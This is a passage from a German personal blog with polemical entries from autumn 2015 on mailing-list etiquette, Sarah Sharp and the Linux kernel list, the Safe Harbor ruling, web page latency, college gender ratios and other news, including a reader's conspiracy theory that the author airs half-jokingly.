Archiv schon beantwortet ist, auf die Mailingliste postest, dann antworten wir nicht, weil es deine Aufgabe gewesen wäre, im Archiv nachzugucken. Die Energiebilanz ist dabei schon negativ, weil alle Subscriber die Zeit verplempern mussten, deine überflüssige Mail zu ignorieren. Wenn du eine Frage auf die Mailingliste schreibst, die schon im Archiv beantwortet wurde, und jemand antwortet jetzt etwas falsches, dann ist das der Worst Case, denn das muss korrigiert werden, sonst findet der nächste Typ, der sich an die Regeln hält und vorher im Archiv guckt, deine falsche Antwort und nicht die richtige und das ganze soziale Konstrukt ist kaputt.
So und jetzt überlegt euch mal, wie viel mehr Aufwand das Schreiben einer Korrekturmail verursacht im Vergleich zum Löschen einer dummen Frage. So viel mehr schlechte Laune erzeugt ihr mit einer falschen Antwort auf eine dumme Frage.
Aber vielleicht war die Frage ja gar nicht dumm und noch nie im Archiv beantwortet? Das kann sein. Denkbar ist es. In meiner langen Karriere in Mailinglisten und im Usenet kann ich mich gerade an keinen einzigen Fall erinnern, wo auf eine tatsächliche neue Frage keine Antworten gekommen sind. Und sei es nur "Das ist ja eine interessante Frage!".
Aber jetzt überlegt euch mal, wie die eben beschriebene Situation auf Außenstehende wirkt. Die Mailingliste ist voller Fragen von Neulingen, und die werden alle ignoriert oder abgekanzelt. Ab und zu antwortet mal jemand auf eine, und der kriegt dann sofort von allen Seiten auf die Fresse. Sieht das wie eine gute Atmosphäre aus? Natürlich nicht! Niemand will das! Aber wer ist Schuld daran?
Aus meiner Sicht: Die Neulinge, die sich nicht an die soziale Konvention gehalten haben. Und das ist einer der fundamentalen Unterschiede zwischen Nerds und anderen Menschen. Andere Menschen haben dann Mitleid mit den Neulingen. Was ist denn das für eine Community, fragen sie, in der man Neulinge so negativ behandelt? Ihr wollt doch wachsen! Seid lieb zu den Newbies!
Und da kann ich nur sagen: Nein, ich will gar nicht wachsen. Die Communities, in denen ich drin bin, sind alle genau richtig groß. Wachstum ist kein Wert an sich, und wenn ich mir Wachstum dadurch erkaufe, dass der Blick in die Mailingliste nur noch aus Schmerz und Trübsal besteht, weil sich keiner an die sozialen Normen hält und sich vorher selber zu helfen versucht, dann sehe ich Wachstum sogar eher negativ als positiv.
Und richtig schlimm wird es, wenn die Neulinge gar nicht kommen, weil sie zu deiner Community wollen, sondern weil sie gehört haben, dass auf deiner Mailingliste die Neulinge so schlecht behandelt werden, und sie was zum Empören gesucht haben.
Wenn man bei einer typischen Mailingliste all die überflüssige Fragen wegnimmt, und all die Antworten auf überflüssige Fragen, dann bleibt im Allgemeinen nicht viel übrig. Das kannst du doch nicht wollen, Fefe? Doch, genau das will ich. Wenn es nichts zu sagen gibt, dann hätte ich gerne Ruhe und würde mich gerne entspannen, anstatt schon wieder 100 sinnlose Mails löschen zu müssen.
Oh und einen noch. Ich beschrieb oben die Eskalationsstrategie von Nerds. Geschichten der Form "dieser höfliche, freundliche Mensch kam auf die Mailingliste und fragte höflich und zurückhaltend diese legitime Frage und wurde zusammengebrüllt und weggemobbt" sind meiner Erfahrung nach alles Lügen. Jede einzelne davon. Ich bin in meinem Leben auf einigen echt haarigen Mailinglisten gewesen, und NOCH NIE habe ich erlebt, dass jemand, der eine legitime Frage gestellt hat, und dabei höflich und zurückhaltend war, angepflaumt wurde. Nicht ein einziges Mal.
Ich habe auch ein paar Mal auf der Linux-Kernel-Mailingliste gepostet über die Jahre. So ein halbes Dutzend bis 10 Mal oder so würde ich schätzen. Wisst ihr, wie häufig ich angepflaumt wurde? ÜBERHAUPT NICHT.
In meinen Augen haben Leute, die auf Twitter Filterblasen betreiben, im Bezug auf das soziale Verhalten anderer mal gepflegt die Fresse zu halten, denn sie haben sich jegliches moralisches Standing verwirkt. Überhaupt finde ich es sehr problematisch, anderen Leuten sagen zu wollen, wie sie ihr Leben zu führen haben. Wenn euch die Linux-Kernel-Mailingliste nicht gefällt, macht halt eine Kernelflausch-Mailingliste auf, wo es gesitteter zugeht. Für über 90% des Inhaltes der echten Kernelmailingliste braucht man Linus' Anwesenheit nicht. Wenn das tatsächlich besser flutscht, dann wird die unsichtbare Hand des Marktes eurer Mailingliste Erfolg bescheren. Wenn nicht, dann werde ich oben auf der Brücke stehen und euch "told you so" zurufen.
Update: Noch was. Nicht auf eine dumme Frage zu antworten ist auch negatives Feedback und am Ende für den Fragesteller gedacht, nicht für die anderen. Der merkt dann hoffentlich, dass er was falsch gemacht hat, und korrigiert sein Verhalten. Newbies, die dumme Fragen stellen, zu helfen, ist nicht nur nicht negatives Feedback, es ist positives Feedback. Damit transportiert man die Nachricht, dass es OK ist, lieber anderer Leute Zeit zu verplempern als selber mal fünf Minuten ins Archiv zu gucken. Damit erzieht man die Leute zum genauen Gegenteil des gewünschen Verhaltens.
Update: Noch einen. Diese Ausführungen basieren auf der Annahme, dass es sich um eine technische, zielgerichtete Mailingliste handelt. Schlaue Projekte haben daher mehrere Mailinglisten. Einmal foo-dev für die Leute, die das Projekt vorantreiben. Einmal foo-announce für die Leute, die nur wissen wollen, wenn eine neue Version rauskam. Und einmal foo-talk als Auffangbecken für die ganzen Schwallbacken, die Mailinglisten als soziales Forum für Smalltalk begreifen.
Update: Auf einen Satz runtergebrochen: Deine Lebenszeit ist nicht wertvoller als meine. Daher mögen die Leute auch keine Werbung, keinen Spam, keine Prediger, keine Cold Calls, keine Vertreter und keine Zeugen Jehovas an der Tür. Wenn du nicht merkst, was für ein Arschloch-Move das ist, meine Zeit mit deinem trivialen Scheiß in Anspruch zu nehmen, dann verschiebst du dich damit direkt drei Punkte auf der Arschloch-Freund-Skala in Richtung Arschloch. Und kommt mir nicht mit freier Meinungsäußerung. Da muss das, was du zu sagen hast, direkt erstmal inhaltlich die drei Minuspunkte wettmachen, damit ich das unter dem Strich positiv bewerten kann. Ich empfinde es übrigens auch als ganz große Frechheit, wenn mich irgendwelche Leute anrufen. Besonders Journalisten halten das für völlig normal, von anderen zu erwarten, dass sie stundenlang mit ihnen telefonieren. Äh, nein. Ich denke gar nicht daran. Mein Telefon ist für Notfälle. Familienmitglied verschollen. Bekannter vermisst. DU bist im Zweifelsfall KEIN Notfall.
Update: Weil sich tatsächlich Einzelne nicht entblöden, das hier als "SO MACHEN NERDS DAS HALT UND DAHER IST DAS SO RICHTIG" zu strohmannisieren: Es ging hier nicht darum, zu sagen, dass das so richtig ist. Ist es vielleicht gar nicht. Es ging darum, zu sagen, dass das nicht böses Fies- und Gemeinsein ist, sondern dass sich da jemand was bei gedacht hat, und dass dein aus deiner Sicht völlig harmloses, gar höfliches Verhalten aus Sicht anderer an asoziales anderer-Leute-schöne-Dinge-kaputtmachen grenzt. Meiner Erfahrung nach ist es viel besser, zu erklären, warum Dinge so sind, als zu erklären, dass sie so sind und passt euch gefälligst an. Die Dinge sind so, weil die Nerds vorher die anderen Optionen durchprobiert haben und die waren alle noch schlechter. Bist du jetzt möglicherweise das Genie, das den Dritten Weg findet, der alles besser macht? Denkbar. Aber sehr, sehr unwahrscheinlich. Viel wahrscheinlicher ist, dass du gerade dabei bist, dich monumental zum Idioten zu machen, indem du die Fehler, die andere Leute schon für dich gemacht haben, nochmal machst. Auf Kosten anderer. :-)

Tue Oct 6 2015

[l] Hier geht noch eine Mail zu der Sarah-Sharp-Geschichte ein, mit Details, die ich nicht kannte.
Das mit Abstand größte Argument hast Du verpaßt. Linus hat das irgendwann mal in einem seiner "Talks" erwähnt, finde ich so schnell leider nicht.
Es gab mal einen Entwickler, der wollte irgendeinen Mist schreiben. Linus war höflich und hat ihm davon abgeraten. Der Entwickler hat es trotzdem gemacht und zwei Jahre später oder so sollte Linus das integrieren. Linus hat nein gesagt.
Kurz später hat ein Bekannter (Frau? Freund?) von dem Entwickler Linus angerufen und meinte, der Typ sei suizid-gefährdet.
Höflichkeit kann Menschenleben kosten. Im Minimalfall hat es den Entwickler zwei Jahre Lebenszeit gekostet. Und an Linus' Stelle hätte ich auch keinen Bock, für anderer Leute Selbstmorde verantwortlich zu sein. Danach würde ich auch keine Zweifel mehr lassen, was ich von solchen Ideen halte.
Oje. Also mit solchen Fällen hatte ich noch nicht zu tun, daher habe ich sowas auch noch nie aus dem Winkel betrachtet. Ich bin da eigentlich eher "Jeder ist seines Glückes Schmied"-Anhänger. Wenn der Typ losrennt und Code hackt, den keiner braucht, nachdem der für die Integration Zuständige ihm davon abgeraten hat, dann hätte ich jetzt halt gesagt: Selbst Schuld. Kommunikation ist keine Einbahnstraße. Hören gehört genau so dazu wie reden.
Ich als Atheist steht ja nicht so auf solche Sprüche, aber den "Gott gab uns zwei Ohren und einen Mund, auf dass wir doppelt so viel zuhören wir reden" mag ich doch sehr gerne.
Ist das eigentlich eine neue Entwicklung, dass man Borderline- und Bipolar-Geschichten als Druckmittel gegen andere benutzt? Mir ist das erst seit 2000 oder so zu Gehör gekommen, dass Leute sowas machen. Ala "wenn du nicht mein Freund wirst, spring ich halt aus dem Fenster und dann ist das deine Schuld". Ich kenne solche Fälle bisher eh nicht persönlich und muss daher auf TV-Serien und Hörensagen zurückgreifen. Weiß da jemand Genaueres?
Update: Hier ist das Video mit Linus und der Suizidgefährdungs-Geschichte.
[l] Ich möchte an dieser Stelle übrigens mal Max Schrems meinen Dank ausdrücken. Wie, der Name sagt euch nichts? Das ist der österreichische Jurastudent, der seit Jahren gegen Facebook kämpft. Max haben wir das heutige EuGH-Urteil zu verdanken, das Safe Harbor kaputtgemacht hat. Der hat solange gegen Windmühlen gekämpft, bis die Windmühlen verloren haben. Auf dem Weg dorthin wurde er belächelt, man hat ihn in der Presse in der Boulevard-Unterhaltungs-Sektion als realitätsfernen Utopisten vorgeführt (ja, auch ich hätte ihn noch stärker unterstützen können, auch wenn ich ein paar Mal gelinkt habe, aber ich hielt seinen Sieg für zu unwahrscheinlich). Hut ab, Max, du hast nicht nur gewonnen, du hast für uns alle gewonnen, und trotz unserer Indifferenz.
Ich fühle mich gerade an ein paar dieser Startup-Kultur-Marketingsprüche erinnert. Ohne Spinner gibt es keinen Fortschritt. Fortschritt kommt von Spinnern, die Dinge tun, die andere für aussichtslos halten. In diesem Sinne: Ein Hoch auf unsere Spinner! Ein Hoch auf Max!
[l] Sarah Sharp, Vorzeige-Linux-Kernel-Hackerin, wirft hin. Ihr Abschiedsstatement.
Schuld ist, natürlich, der fiese Kommunikationsstil der Alphamännchen auf der Kernel-Mailingliste.
Ich frage mich ja, mit welchem Recht eigentlich solche Leute einfach annehmen, sie seien im Recht und die anderen müssten sich anpassen. Auf der Kernelmailingliste sind hunderte aktive Poster, wahrscheinlich noch tausende von Lurkern. Und dann kommt diese eine Frau und bringt sowenig Respekt für die etablierten Strukturen mit, dass sie da jahrelang einen Krieg führt, um "Verhaltensregeln" installiert zu kriegen — gegen den Widerstand der ganzen anderen Leute, die auf der Mailingliste was machen. Wie kann man denn bitte von Respekt reden, wenn man selbst den Respekt nicht aufbringen kann, die Leute selber entscheiden zu lassen, in welcher Umgebung sie arbeiten wollen? Dieses Abschiedsstatement lässt auch mal wieder tief blicken. Sie habe keine Kraft mehr (Opferrolle), sie könne den Ton nicht mehr ertragen (Opferrolle), sie melde schon gar keine Bugs mehr, weil sie Kommunikation mit diesen Leuten nicht aushält (Opferrolle). Sie war übrigens auch Kernel-Koordinator für das "FOSS Outreach Program for Women". Das hat auch nicht geklappt. Und Schuld sind natürlich die ganzen fiesen Maskus auf der Mailingliste.
Aber auf die Idee, dass das Ziel der Kernelmailingliste nicht der Outreach an Frauen sondern die Arbeit am Kernel ist, und dass sie möglicherweise schon viel mehr Toleranz erfährt als sie mit ihrem Anliegen oder Verhalten verdient hätte, weil die Leute sie eben doch respektiert haben, auf die Idee kommt niemand.
Ich stelle mir mal vor, wie das abliefe, wenn ein einzelner Mann zu, sagen wir mal, einem Bridgeclub käme, und den Damen dort erklärt, sie sollten gefälligst mal Outreach für Männer betreiben und ihn Bier saufen, die Füße auf den Tisch legen und Rülpsen lassen, und in der Ecke will er einen Fernseher mit Fußballübertragungen haben. Da wären sich sofort alle einig, dass das ein Arsch ist, der da mal bitte von ein paar Pflegern rausbegleitet gehört.
Ja aber aber aber du sprichst dich doch nicht ernsthaft gegen einen zivilen Ton aus, Fefe? Doch, tue ich. Eine technische Mailingliste, in der man beschissenen Code nicht brandmarken darf, weil es die Gefühle des Autoren verletzen könnte, in der man einen Bug nicht Bug nennen darf, weil das nicht flauschig genug ist, in der man einen Patch zur Einführung des Binnen-I in der Dokumentation nicht rausschmeißen kann, weil das nicht politisch korrekt wäre, wenn man Idioten rausschmeißt, so eine Mailingliste verfehlt ihren Zweck. Das wäre wie wenn man ein Auto baut, das keine Vollbremsungen zulässt. Manchmal braucht man das, und ja, da können Leben von abhängen. Es gibt für technische Projekte genau gar keinen Grund, sich von irgendwelchen Leuten vorschreiben zu lassen, wie sie ihr Projekt zu machen haben. Wenn es euch nicht gefällt, forkt halt. Oh, das geht nicht? Da müsste man ja Arbeit in was anderes als empört sein investieren? Tsja.
Der Vollständigkeit halber: Ich kenne Sarah Sharp nicht, habe sie nie getroffen oder mit ihr gemailt. Ich nehme sie hier nur als Aufhänger. Sie kann wahrscheinlich am wenigstens für das, was ich hier beschreibe, denn sie hat ja tatsächlich auch technisch mitgearbeitet. Aber sie ist halt die Repräsentantin dieses Trends und sie hat jetzt News gemacht, daher jetzt diese Kommentar.
Leute, wenn ihr euch über das Binnen-I empören wollt, dann macht halt ein belangloses Sprachenblog auf und rantet da vor euch hin. Wenn sich niemand interessiert, dann ist das kein Zeichen, dass der liebe Gott hinter euch steht und ihr die ganze Zeit im Recht wart und ihr jetzt einen Kreuzzug lostreten sollt, sondern dann ist das ein Zeichen, dass euer Anliegen nicht mehrheitsfähig ist. Deal with it.
PS: Habe heute Schnupfen und Halsweh (Opferrolle) und kein Kraft mehr (Opferrolle) für Toleranz gegenüber Intoleranten übrig, die mir ihr Lebensmodell aufzwängen wollen. Toleranz geht in beide Richtungen. Du kannst nicht von mir Toleranz für deine Ideen und Gedanken fordern, und dann keine für meine Ideen und Gedanken haben. Und nein, du bist nicht automatisch im Recht, nur weil du das glaubst. Die Merkel hält sich auch für im Recht. Wenn es für deine Positionen keinen Weg gibt, dich von ihrer Falschheit zu überzeugen, dann ist das keine Position sondern eine Religion und du solltest dich was schämen.
Update: Ich will das noch ein bisschen konkretisieren, was ich meine. Die Voraussagen sind immer die selben: Linux laufen die Leute weg, das Potenzial der Frauen als Mithelfer geht flöten, am Ende stehen Ruin und Untergang. Das sind Voraussagen, die auf Basis einer Theorie gemacht werden. Der Grund, wieso man solche Aussagen macht, ist weil man dann eine Messung durchführen kann, und sehen kann, ob die Messung mit der Voraussage übereinstimmt (das würde die Theorie bestätigen) oder nicht (dann war die Theorie falsch). So und jetzt gucken wir uns mal die Messung an: Linux ist und bleibt eines der erfolgreichsten, wenn nicht das erfolgreichste Open Source Projekt aller Zeiten. Von Developer-Exodus keine Spur. Anders gesagt: Die Messung hat die Voraussagen und damit die Theorie falsifiziert. Deal with it.
Update: Bei Slashdot hat mal jemand in den Archiven gewühlt und die ursprünglichen Beschwerden von Sarah gefunden. Lest selbst.
Update: Jetzt schlagen hier Klugscheißer auf, die meckern, dass ich Theorie schrieb, als ich Hypothese hätte schreiben sollen. Die Klugscheißer haben völlig Recht.
[l] Ist euch mal aufgefallen, dass mein Blog relativ schnell lädt? Wahrscheinlich.
Habt ihr euch auch mal gefragt, warum dass so ist? Ist meine Anbindung so toll? Meine Hardware? Meine Software? Cache ich so krass?
Nein. Ich cache hier nichts. Jede Anfrage, die reinkommt, erzeugt und beendet zwei Prozesse und eine Kette aus 4 Interprozess-Kommunikationen. Es gibt kein memcache, keinen Varnish, kein Load-Balancer, kein Cassandra, kein Akamai, nichts. Der einzige Grund, wieso das bei mir flutscht, ist weil ich die Anzahl der HTTP-Anfragen minimiert habe und nichts externes reinlade. Bei mir kommt es im Allgemeinen bei einem Zugriff zu drei HTTP-Requests. Einmal das HTML selbst, einmal das favicon, und einmal das CSS, wenn ihr eines einbindet. favicon und CSS sind statisch und müssen normalerweise nicht neu übertragen werden. Bleibt als einziger Inhalt das HTML. Das komprimiere ich vor der Übertragung, und benutze auch kein CMS, was das irgendwie aufblähen könnte. Hier gibt es kein Typekit, kein React, kein jquery, keine Facebook-Buttons, etc.
Das mag jetzt trivial erscheinen, aber überlegt euch mal folgendes. Nehmen wir mal an, eine Webseite besteht aus 100 Elementen. Der Webserver bei einem davon hat einen Schluckauf und braucht 10 Sekunden. Dann lädt die Seite gefühlt langsam. Mal ganz abgesehen von der riesigen Datenmenge, versteht sich, die durch so viele Elemente entstehen. Alleine die Header sind ja schon 2 KB pro Anfrage.
Mein Webserver hat bestimmt auch gelegentlich mal einen schlechten Request, der aus irgendeinem Grund langsam ist. Wenn bei mir jeder 1000. Request gammelig ist, betrifft das nicht mal jeden hundersten User. Wenn bei einer Site mit 100 Elementen jeder 1000. Request gammelig ist, betrifft das jeden Zehnten.
Ich erwähne das alles bloß als Einleitung für eine Video-Empfehlung: Ein Talk darüber, wie man Latenz misst. Es geht um den Web-Kontext. Die Kurzzusammenfassung ist: Fast alle machen es falsch. Ihr wahrscheinlich auch. Außer ihr habt eure Messtools selber gehackt, und selbst dann möglicherweise immer noch.
Ich habe übrigens in gatling damals das Logformat extra so gemacht, dass das eine angesprochene Problem nicht deshalb nicht messbar ist, weil die vorliegenden Daten es nicht zulassen. Vielleicht sollte ich meine Ad-Hoc-Messtools mal ein bisschen professionalisieren und veröffentlichen, wenn die Tool-Situation wirklich so übel ist, wie er in dem Vortrag sagt.

Mon Oct 5 2015

[l] Obama so: Liebe Medien, vergleicht doch mal die Anzahl der durch Schusswaffen zu Tode kommenden Amerikaner mit denen bei Terroranschlägen gestorbenen!
CNN so: Na gut, wenn es denn sein muss.
Und dann alle so: Ach du Scheiße ist das krass. Ja und so überraschend! Ist ja nicht so, als würde da seit Jahren niemand drauf hinweisen.
Update: 100 Medienkompetenzpunkte an alle, die gemerkt haben, dass CNN in ihrer Grafik extra die Null-Linie auf der Y-Achse verschoben hat, damit man die Terrortoten im Vergleich zu den Schusswaffentoten überhaupt von der Nulllinie unterscheiden kann. Die FAS hat das in ihrer Grafik nicht gemacht. Wer es nicht gemerkt hat, guckt bitte bei Grafiken ab jetzt genauer hin.

Fri Oct 2 2015

[l] Ich bin gerade ziemlich schockiert über unsere Abstumpfung bezüglich Krieg. Diese Meldung hier hat das ausgelöst. Ich zitiere mal:
Russland und die USA wollen bei ihren Einsätzen in Syrien "eine Art Unfall am Himmel vermeiden". Deshalb haben sie nun Gespräche auf militärischer Ebene geführt.
Wir haben es hier mit zwei Nationen zu tun, die mit ihren Massenmordgeräten über einem anderen Land herumfliegen und Massenmordbomben auf Menschen werfen. Und die wollen jetzt Unfälle vermeiden. Unfälle! Daher sprechen sie sich jetzt ab, damit ihre Massenmordgeräte nicht versehentlich kollidieren (oder was ist da die Befürchtung?).
Wie verroht sind wir als Gesellschaft eigentlich schon?
Übrigens würde ich echt gerne mal wissen, wieso wir eigentlich zu Kriegsfragen die Nato befragen. Das ist wie wenn man zu Gesundheitsfragen von Fast Food McDonald's befragt. Oder zu der Frage, ob es ein Recht auf Trinkwasser geben sollte, Nestle. Oder wenn man nach einem College-Amoklauf die US-Waffenlobby befragt.
Immerhin hat wohl der Sheriff vor Ort soviel Vernunft gezeigt, den Namen des Schützen nicht nennen zu wollen, um ihm die Aufmerksamkeit nicht zu geben, für die er das wohl gemacht haben wird. So sollten immer alle Massaker behandelt werden.
Update: Link für Sheriff-sagt-den-Namen-nicht.

Thu Oct 1 2015

[l] Apple schmeißt die "iFixit"-App aus dem App Store. Begründung: Die hätten unautorisiert ein Apple-TV und eine Siri-Fernbedienung aufgemacht. Apple hatte denen (eine Firma, deren Geschäftsmodell es ist, Geräte aufzuschrauben) ein paar Testgeräte zugeschickt. Und die haben sie dann … nunja … aufgemacht.
Aber macht ja nichts. Für den Preis, den man bei der Reparatur spart, kann man sich dann auch ein Android-Zweitgerät anschaffen. Oder man spart sich den Apple-Kram direkt ganz und kauft sich für das Geld fünf Android-Geräte. Oder was ist da der aktuelle Kurs?

Tue Sep 29 2015

[l] Wie kommt das eigentlich, dass so viele großartige weibliche Singles keinen Mann finden?
Öhm. Ist das so? Das ist mir bisher noch nicht so aufgefallen.
There simply aren't enough college-educated men to go around. For every four college-educated women in my generation, there are three college-educated men. The result? What Birger calls a "musical chairs" of the heart: As the men pair off with partners, unpartnered straight women are left with fewer and fewer options—and millions of them are eventually left with no options at all.
Ach? Ich dachte, die Frauen werden vom Patriarchat kleingehalten und in die Küche gedrängt und müssen an den Unis bevorzugt behandelt werden, damit es endlich Gleichberechtigung gibt? Die Statistik scheint deutlich anders auszusehen:
So, where are all the men?
I mean they exist, they're just not going to college. This isn't China or India where they have a man-made gender imbalance because of all sorts of horrendous things. [Men are] out there, they're just not going to college. Last year about 35 percent more women than men graduated from college.
Wenn ich nicht so schockiert von dieser Statistik wäre, würde ich vielleicht laut darüber nachdenken, ob das "Problem" nicht daran liegen könnte, dass Frauen es für unter ihrer Würde halten, einen Mann aus einer sozialen Schicht unterhalb ihrer eigenen zu heiraten, während sie umgekehrt von Prinzen träumen, die sich eine Magd zur Prinzessin nehmen. Die These las ich vor ein paar Jahren unter leicht anderem Kontext. Damals ging es um die Kernaussage, dass es früher noch viel üblicher als heute war, dass Männer Frauen "aus einfachen Verhältnissen" geheiratet haben, und dass das andere positive Seiteneffekte hatte in Bezug auf die Aufstiegschancen von Frauen in der Gesellschaft, und das es daher heute viel schwieriger bis faktisch unmöglich ist, als Mädchen aus einer armen Familie am Ende des Lebens Teil der Oberschicht zu sein. Der Begriff war glaube ich Durchlässigkeit zwischen den Schichten oder so.
Aber wartet, wird noch krasser:
The Department of Education projects that by the class of 2023, there will be 47 percent more women than men [graduating from college].
o_O
Vielleicht wäre das dann jetzt mal der Zeitpunkt, bei dem man die Förderung von Mädchen abbricht und gezielt die Jungen fördert?
Wie sehen denn die Statistiken in Europa aus?
Aber wartet, wird noch krasser:
The other interesting thing—and you see this in China too—if you look at census data on fully-employed, non-college-educated men age 25 to 30, the ones who are married earn 20 percent more than the ones who are not married. Which tells me that in order to get married and attract a wife, you have to earn more and be more entrepreneurial and work harder.
Hey, vielleicht sind uns die Japaner ja an der Stelle gesellschaftlich deutlich voraus. Aus Japan hört man ja immer die Geschichten, dass die Jugendlichen völlig sexabstinent aufwachsen, bis ins höhere Alter im Elternhaus wohnen, teilweise den ganzen Tag in einem Internetcafe oder daheim im Keller verbringen. Vielleicht folgt solches Verhalten schlicht daraus, dass es sich für Männer nicht lohnt, eine akademische Karriere oder eine Familie zu haben, und beides schon mal gar nicht.
Interessanterweise sagt dieser Artikel aber auch, dass Männer heutzutage genau so wenig wie Frauen bereit sind, weniger gebildete Frauen zu daten. Allerdings gibt es in der Uni-Schicht in den USA so viel mehr Frauen als Männer, dass das nur für die Frauen ein Problem ist.
Und der Lacher am Ende ist dann der Vorschlag, doch ins Silicon Valley zu ziehen. Dort sei der beste Ort für Frauen, weil es dort einen überschuss an gebildeten Männern gibt.
Update: Mir sind ein paar Statistiken zugegangen: Statistisches Bundesamt, Jahresübersicht 1999-2014 (die Absolventenzahlen haben sich in dem Zeitraum mehr als verdoppelt. Ist das das Bolognese-System mit seinen Antipasta-"Abschlüssen" in Aktion?). Man sieht in den Zahlen, dass seit 2006 mehr Frauen als Männer einen Abschluss machen. Der Einsender fügt noch folgende Erklärungen an:
Dazu sei angemerkt, dass sich die Frauenquote anschließend mit höherer Hierarchiestufe anschließend ausdünnt (leitende Angestellte, Professoren, etc.), was hauptsächlich mit Mutterschaft zusammenhängt. In der Regel, aber mit abnehmender Tendenz, arbeiten westdeutsche Frauen nach der Geburt Teilzeit mit entsprechenden Einkommensbußen. Im Osten sieht das traditionell anders aus, West und Ost nähern sich hier aber seit der Wende aneinander an.
Aufstieg durch Ehe ist in den letzen Jahrzehnten tatsächlich seltener geworden. In der Soziologie wird das unter dem Stichwort Homogamie diskutiert: Menschen neigen in der Regel dazu, sich statusähnliche Partner zu suchen. Früher gab der Heiratsmarkt das kaum her aufgrund des Verhältnisses von Männern und Frauen mit Hochschulstudium. Heirat war hier für Frauen in der Tat ein häufiges Mittel zum sozialen Aufstieg und trug zur sozialen Mobilität bei. Homogamie ist in der Tat ein wesentlicher Faktor für abnehmende intergenerationale soziale Mobilität seit Anfang der 90er Jahre.
Dass Männer nach unten heiraten, war auch lange gesellschaft tradiert und akzeptiert. Die Geschlechterrollenvorstellungen haben sich seitdem zwar gewandelt, allerdings nicht so drastisch, wie man aufgrund mancher Twitterhysterie vermuten würde. Traditionelle Arbeitsteilung im Haushalt ist immer noch üblich und (West-)Deutschland wird vorwiegend unter dem Stichwort Male-Breadwinner Model diskutiert, im Gegensatz zu Ländern mit überwiegend partnerschaftlicher häuslicher Arbeitsteilung wie Schweden. Polen ist hier übrigens ein ganz interessanter Fall, weil die Geschlechterrollenvorstellungen relativ traditional sind, die häusliche Arbeitsteilung und Erwerbsarbeit ist aber aufgrund der geringen Einkommen eher gleich zwischen Partnern verteilt.
Ein anderer Einsender merkt noch an:
Die, die die Studie erstellt haben, hätten sich schon vor Jahren im Iran(!) umschauen sollen. Die kennen dieses Problem viel länger und intensiver. Dort waren vor 10 Jahren (als ich mal dort war) ungefähr 2/3 der Studierenden Frauen. Dasselbe beim Lehrpersonal! Welcher Europäer jetzt denkt, naja, die Frauen studieren Lehramt, was Medizinisches oder Diskussionswissenschaften, weit gefehlt. Im Iran sind auch die Ingenieursstudiengänge (etec, mach, inf, u.ä.) bestens mit Frauen versorgt. Die Aachener und Karlsruher würden sich die Augen reiben ;-)
Dort habe ich allerdings einen Verdacht: die Männer ruhten sich auf ihrem Patriarchat aus, glaubten kräftig an ihren Gott und dessen Institutionen, während die Frauen die Gelegenheit nutzten, um was Sinnvolles zu lernen.
Aktuelle Entwicklung im Iran: es gibt Zugangsbeschränkungen für Frauen.
Von gläubigen Männern gemacht.
Und ein dritter Einsender hat diesen Link zur Schweiz geschickt, laut dem das Wintersemester 2000/2001 bei der Uni Zürich der Turning Point war.
Update: Noch ein Kommentar:
Die Soziologin Eva Illouz hat dazu ein sehr interessantes Buch mit dem (furchtbaren!) Titel "Warum Liebe weh tut" geschrieben, in welchem sie u.a. die These aufstellt, dass es für Männer heutzutage auch kaum noch einen Grund gibt, sich zu binden. Mal kurz zusammengefasst begründet sie dies damit, dass Frauen ja früher weniger aus Liebe geheiratet wurden, sondern eine bzw. mehrere Funktionen hatten, wie z.B. den Haushalt organisieren, Kinder großziehen, es war gesellschaftlich gefordert verheiratet zu sein, bessere Steuerkonditionen & Aufstiegschancen des Mannes mit Frau, Zugang zu Sex etc. Viele dieser Gründe bestehen heute nicht mehr, sodass Männer schlichtweg nicht mehr so stark den Drang und Willen haben, eine Bindung einzugehen. Zumal auch gerade die damit einhergehenden Pflichten/Einschränkungen abschreckend wirken können (Willkommen in der ewigjungen Spaßgesellschaft ;-) ). Ebenso stehen Männer zeitlich nicht so unter Druck, wenn es um die Familiengründung geht.
[l] Ich habe mir da nie Gedanken drum gemacht bisher, aber irgendwie nagt seit diesen Plagiatsvorwürfen die Frage in mir, wie jemand mit Medizin-Ausbildung überhaupt Kriegsministerin werden kann. Ich zitiere mal das Genfer Gelöbnis:
Bei meiner Aufnahme in den ärztlichen Berufsstand gelobe ich feierlich:
mein Leben in den Dienst der Menschlichkeit zu stellen.
Ich werde meinen Lehrern die schuldige Achtung und Dankbarkeit erweisen.
Ich werde meinen Beruf mit Gewissenhaftigkeit und Würde ausüben.
Die Gesundheit meines Patienten soll oberstes Gebot meines Handelns sein.
Ich werde alle mir anvertrauten Geheimnisse auch über den Tod des Patienten hinaus wahren.
Ich werde mit allen meinen Kräften die Ehre und die edle Überlieferung des ärztlichen Berufes aufrechterhalten.
Meine Kolleginnen und Kollegen sollen meine Schwestern und Brüder sein.
Ich werde mich in meinen ärztlichen Pflichten meinem Patienten gegenüber nicht beeinflussen lassen durch Alter, Krankheit oder Behinderung, Konfession, ethnische Herkunft, Geschlecht, Staatsangehörigkeit, politische Zugehörigkeit, Rasse, sexuelle Orientierung oder soziale Stellung.
Ich werde jedem Menschenleben von seinem Beginn an Ehrfurcht entgegenbringen und
selbst unter Bedrohung meine ärztliche Kunst nicht in Widerspruch zu den Geboten der Menschlichkeit anwenden.
Dies alles verspreche ich feierlich und frei auf meine Ehre.
Sieht da noch jemand einen Widerspruch mit einer Karriere als Leiterin einer Armee? Leben im Dienst der Menschlichkeit? Jedes Menschenleben von seinem Beginn an Ehrfurcht entgegenbringen? Was könnte weiter entfernt von einer Militärkarriere sein!
[l] Hier kommt noch eine Verschwörungstheorie für euch rein:
um bei der Sache mit Griechenland, den Olympischen Spielen und der Ukraine noch eins drauf zu setzen:
Was glaubst Du, hat die NSA bei den Winterspielen in Sochi gemacht ?
https://de.wikipedia.org/wiki/Olympische_Winterspiele_2014
Ich habe damals die Spiele (und den Putsch in der Ukraine) im russischen Fernsehen (in Litauen) verfolgt. Putin waren da die Hände gebunden und konnte nicht eingreifen! Das wusste der CIA ganz genau!
Hmm, ja, also … das war schon eine auffällige zeitliche Koinzidenz, dieser Ukraineputsch so direkt im Vorfeld zu den Sochi-Spielen. *bartkraul*

Mon Sep 28 2015

[l] Bei BER haben sie auch noch 600 Brandschutzwände aus den falschen Materialien gebaut, die müssen jetzt abgerissen und mit dem richten Stein und Mörtel neu gebaut werden.
Haben die da eigentlich auch irgendwas richtig gemacht? Also außer dem Empfängerkonto auf den vielen, vielen Überweisungen jetzt.

Fri Sep 25 2015

